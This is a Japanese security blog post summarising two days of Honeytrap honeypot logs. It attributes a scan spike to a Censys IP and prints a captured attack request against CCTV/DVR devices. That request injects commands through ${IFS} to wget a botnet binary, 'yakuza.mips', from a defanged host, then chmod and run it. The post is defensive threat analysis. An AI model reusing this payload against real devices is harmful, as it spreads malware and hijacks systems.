sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(236-237日目:4/7-4/8)

Honeytrap簡易分析(236-237日目:4/7-4/8)となります。ちょっとした手違いで一部のログが欠損していました。。。。。


◾️Honeytrap簡易分析(236-237日目:4/7-4/8)
※ 80ポートは除く

f:id:one-chick-sec:20190410171220p:plain

f:id:one-chick-sec:20190410171414p:plain


一部、こちらの操作ミスでログが欠損しています。4/7の5:00-6:00に検知数が多くなっていますが、特定のIPからの各ポートへのスキャン行為によって増加しています。特定のIPは以下の通りです。

攻撃元IP:
198[.]108[.]67[.]48 (https://www.abuseipdb.com/check/198.108.67.48)

IPを調査した結果、インターネットに接続されたホストやネットワークを検索するサービスを提供している Censys 社のものでした。よって、脆弱性調査で発生した通信と推測されます。


<新規マルウェアダウンロード>

ポート マルウェアダウンロード先 HTTPリクエストパス VT 備考
8443 hxxp://159[.]203[.]86[.]235//html/yakuza[.]mips GET /cgi-bin/;cd${IFS}/var/tmp;${IFS}wget ~省略~

VirusTotal

 


ペイロード
GET /cgi-bin/;cd${IFS}/var/tmp;${IFS}wget${IFS}hxxp://xxx[.]xxx[.]xxx.xxx//html/yakuza.mips;${IFS}chmod${IFS}777${IFS}/html/yakuza.mips;${IFS}.//html/yakuza.mips;${IFS}rm${IFS}-rf${IFS}/html/yakuza.mips HTTP/1.1
Host: XXX.XXX.XXX.XXX:8443
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64

70以上のベンダから発売されているCCTVとDVRの脆弱性を狙ったリモートコード実行を狙った攻撃となります。
今回の攻撃の手順は以下の通りと推測されます。
wgetマルウェア yakuza.mips をダウンロード
パーミッションを 777 に変更し、yakuza.mips を実行
③ yakuza.mips を削除

参考:
https://www.paloaltonetworks.jp/company/in-the-news/2018/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns

https://www.exploit-db.com/exploits/39596

以上となります。